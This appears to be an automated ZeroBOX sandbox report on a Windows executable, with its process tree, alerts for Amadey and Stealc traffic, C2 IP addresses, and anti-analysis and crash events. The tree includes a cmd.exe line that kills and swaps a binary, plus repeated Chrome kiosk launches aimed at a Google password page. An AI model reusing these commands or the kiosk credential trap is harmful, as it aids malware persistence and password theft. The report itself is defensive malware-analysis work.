Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 2, 2024, 10:58 a.m.	Sept. 2, 2024, 11:06 a.m.

Size	1.8MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`457d9a15d305df62fe34c5076f3cad9d`
SHA256	`572d806c0b56d27fe05562301de6a9ed45cda3f36aef2f6e370867d9f3847013`
CRC32	`3AB5ECB6`
ssdeep	`49152:ReTfFaz/B/1mN6QUASzMvovH/ifnqXkTZROKjVprs:69a+N6QU94oCfH+gvrs`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

random.exe "C:\Users\test22\AppData\Local\Temp\random.exe"
2572
- explorti.exe "C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
  2856
  - cmd.exe "C:\Windows\System32\cmd.exe" /k "taskkill /f /im "explorti.exe" && timeout 1 && del "explorti.exe" && ren 0657d1 explorti.exe && C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe && Exit"
    3064
    - taskkill.exe taskkill /f /im "explorti.exe"
      2080
    - timeout.exe timeout 1
      320
    - explorti.exe C:\Users\test22\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
      2212
      - svoutse.exe "C:\Users\test22\AppData\Local\Temp\0e8d0864aa\svoutse.exe"
        2640
        
        67c526b265.exe "C:\Users\test22\AppData\Roaming\1000026000\67c526b265.exe"
        2772
        
        7e0b49b7db.exe "C:\Users\test22\AppData\Roaming\1000027000\7e0b49b7db.exe"
        828
        
        00ce99c2f6.exe "C:\Users\test22\AppData\Local\Temp\1000028001\00ce99c2f6.exe"
        2996
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        2228
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        1864
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2232 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        2452
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        2592
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        2316
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2584 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        1848
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        284
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        800
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=300 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        2180
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        2204
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        2472
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2112 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        1096
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        2852
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        2928
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2844 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        3008
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        1576
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        2076
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2988 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        3196
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        3128
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        3348
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3132 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        3720
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        3496
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        3688
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3500 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        3884
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        3780
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        3924
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3784 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        3852
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        4076
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        3944
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=4080 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        560
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        2324
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        1788
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2192 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        4392
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        4164
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        4312
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=4168 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        4588
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        4420
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        4688
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=4424 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        4968
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        4772
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        4960
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=4776 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        1552
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        5012
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        4180
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=5016 --on-initialized-event-handle=308 --parent-handle=312 /prefetch:6
        2208
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password
        4336
        
        chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef4eef1e8,0x7fef4eef1f8,0x7fef4eef208
        4668
explorer.exe C:\Windows\Explorer.EXE
1452

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
185.215.113.100	Active	Moloch
185.215.113.19	Active	Moloch
31.41.244.10	Active	Moloch
31.41.244.11	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 185.215.113.19:80 -> 192.168.56.101:49165	2400032	ET DROP Spamhaus DROP Listed Traffic Inbound group 33	Misc Attack
TCP 31.41.244.11:80 -> 192.168.56.101:49167	2400001	ET DROP Spamhaus DROP Listed Traffic Inbound group 2	Misc Attack
TCP 192.168.56.101:49167 -> 31.41.244.11:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 31.41.244.11:80 -> 192.168.56.101:49167	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 31.41.244.11:80 -> 192.168.56.101:49167	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 31.41.244.11:80 -> 192.168.56.101:49167	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49168 -> 185.215.113.19:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 31.41.244.10:80 -> 192.168.56.101:49175	2400001	ET DROP Spamhaus DROP Listed Traffic Inbound group 2	Misc Attack
TCP 192.168.56.101:49176 -> 31.41.244.11:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 31.41.244.11:80 -> 192.168.56.101:49176	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 31.41.244.11:80 -> 192.168.56.101:49176	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 31.41.244.11:80 -> 192.168.56.101:49176	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49175 -> 31.41.244.10:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49175 -> 31.41.244.10:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49175 -> 31.41.244.10:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.101:49176 -> 31.41.244.11:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49176 -> 31.41.244.11:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.215.113.100:80 -> 192.168.56.101:49178	2400032	ET DROP Spamhaus DROP Listed Traffic Inbound group 33	Misc Attack
TCP 192.168.56.101:49178 -> 185.215.113.100:80	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	Malware Command and Control Activity Detected
TCP 192.168.56.101:49188 -> 185.215.113.100:80	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Queries for the computername (5 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 2, 2024, 10:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 2, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 2, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 2, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 2, 2024, 10:59 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (50 out of 270 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 2, 2024, 10:58 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:58 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:58 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:58 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 11:01 a.m.			0	0
IsDebuggerPresent Sept. 2, 2024, 10:59 a.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 2, 2024, 10:58 a.m.	buffer: SUCCESS: The process "explorti.exe" with PID 2856 has been terminated. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:59 a.m.	buffer: Waiting for 1 console_handle: 0x00000007	1	1
WriteConsoleW Sept. 2, 2024, 10:59 a.m.	buffer: seconds, press a key to continue ... console_handle: 0x00000007	1	1

Tries to locate where the browsers are installed (1 event)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 2, 2024, 10:59 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (6 events)

section	\x00
section	.idata
section
section	mlkfqtwe
section	ezviljwn
section	.taggant

One or more processes crashed (50 out of 736 events)

Time & API	Arguments	Status
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc exception.symbol: random+0x3100b9 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 3211449 exception.address: 0x14600b9 registers.esp: 3210220 registers.edi: 0 registers.eax: 1 registers.ebp: 3210236 registers.edx: 23052288 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 34 24 be e1 d4 fd 7b e9 55 02 00 exception.symbol: random+0x6d29a exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 447130 exception.address: 0x11bd29a registers.esp: 3210184 registers.edi: 1968898280 registers.eax: 31234 registers.ebp: 4008620052 registers.edx: 18153472 registers.ebx: 18599338 registers.esi: 3 registers.ecx: 1969094656	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 04 24 c7 04 24 21 34 dc exception.symbol: random+0x6d2e8 exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 447208 exception.address: 0x11bd2e8 registers.esp: 3210188 registers.edi: 15329622 registers.eax: 0 registers.ebp: 4008620052 registers.edx: 18153472 registers.ebx: 18602112 registers.esi: 3 registers.ecx: 1969094656	1
__exception__ Sept. 2, 2024, 10:58 a.m.	stacktrace: exception.instruction_r: fb 81 ec 04 00 00 00 89 1c 24 89 14 24 e9 1d 01 exception.symbol: random+0x6de0b exception.instruction: sti exception.module: random.exe exception.exception_code: 0xc0000096 exception.offset: 450059 exception.address: 0x11bde0b registers.esp: 3210188 registers.edi: 15329622 registers.eax: 28305 registers.ebp: 4008620052 registers.edx: 18153472 registers.ebx: 18630843 registers.esi: 3 registers.ecx: 432271100	1
